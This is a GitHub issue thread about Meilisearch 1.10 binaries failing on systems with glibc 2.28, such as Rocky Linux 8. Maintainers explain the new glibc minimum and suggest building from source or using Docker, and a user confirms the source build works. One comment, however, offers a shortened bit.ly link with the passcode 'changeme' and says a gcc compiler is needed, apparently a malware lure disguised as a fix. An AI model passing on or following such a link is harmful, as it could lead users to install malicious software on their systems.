### ISSUE TITLE
Lib GLIBC 2.28 

### ISSUE THREAD

**Issue by marie-oxeva** [meilisearch/meilisearch#4914]
Hello, 

In the doc (https://www.meilisearch.com/docs/learn/self_hosted/supported_os#linux) I see that meilisearch is compatible with 2.28, however since version 1.10 with rocky8, we have a compatibility problem. 

./meilisearch: /lib64/libc.so.6: version `GLIBC_2.29' not found (required by ./meilisearch)

can you tell me if it's the doc that's out of date or a bug?

**Comment by Har33m-Sha1kh** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by dureuill** [comment]
Hello, the docs appear out of date.

[Self-hosted Meilisearch now requires Ubuntu v20.04 LTS or higher](https://blog.meilisearch.com/meilisearch-1-10/#self-hosting-ubuntu-v20-is-now-required).

The [release notes](https://github.com/meilisearch/meilisearch/releases/tag/v1.10.0) go into more detail as to why:

> Because the GitHub Actions runner now enforces the usage of a Node version that is not compatible with Ubuntu 18.04 anymore, we had to upgrade the minimal Ubuntu version compatible with Meilisearch. Indeed, we use these GitHub actions to build and provide our binaries.
> 
> Now, Meilisearch is only compatible with Ubuntu 20.04 and later and not with Ubuntu 18.4 anymore.
> 
> Done by @curquiza in https://github.com/meilisearch/meilisearch/pull/4783. 

You need a Linux distribution with a glibc at least as new as the one in Ubuntu 20.04 if using the Meilisearch binaries produced by our CI.

I'm closing this issue, feel free to reopen as needed.

**Comment by ultrono** [comment]
Just attempted to install an it appears version 2.29 is now the minimum. After following the install docs I get:

`/usr/local/bin/meilisearch: /lib64/libm.so.6: version GLIBC_2.29 not found (required by /usr/local/bin/meilisearch)`

Running `ldd --version` indicates I have version 2.28 installed :/

**Comment by irevoire** [comment]
Hey, yes, sorry.

As @dureuill stated above, we now only ship Meilisearch version with a glibc at least as new as the one in ubuntu 20.04, which is the glibc 2.31 😔 

If you cannot upgrade your system to a newer version, I’m afraid the only solution left for you is to build Meilisearch from scratch yourself by cloning the repository and then running `cargo build --release` in the `meilisearch` directory.

Then the generated binary should be available under `target/release/meilisearch`.

To avoid this kind of issue, you can also use our official docker image: https://hub.docker.com/r/getmeili/meilisearch

**Comment by danFbach** [comment]
@irevoire fyi, your docs are still incorrect [https://www.meilisearch.com/docs/learn/self_hosted/supported_os#linux](https://www.meilisearch.com/docs/learn/self_hosted/supported_os#linux)
Also, can you let us know what the last version that used glibc 2.28? Not sure if you're aware, but EL8 is (and probably will indefinitely be) stuck at glibc 2.28 - which is a pretty big audience you are excluding.

**Comment by danFbach** [comment]
Hi @irevoire,
Thanks for the quick reply. I'll try compiling it, otherwise i'll try with docker/podman.
Totally understand having limited resources on OS project - thanks for the good work!

**Comment by danFbach** [comment]
@irevoire Compiling worked great - just took 20 mins on the vps 😂 
Thanks!!
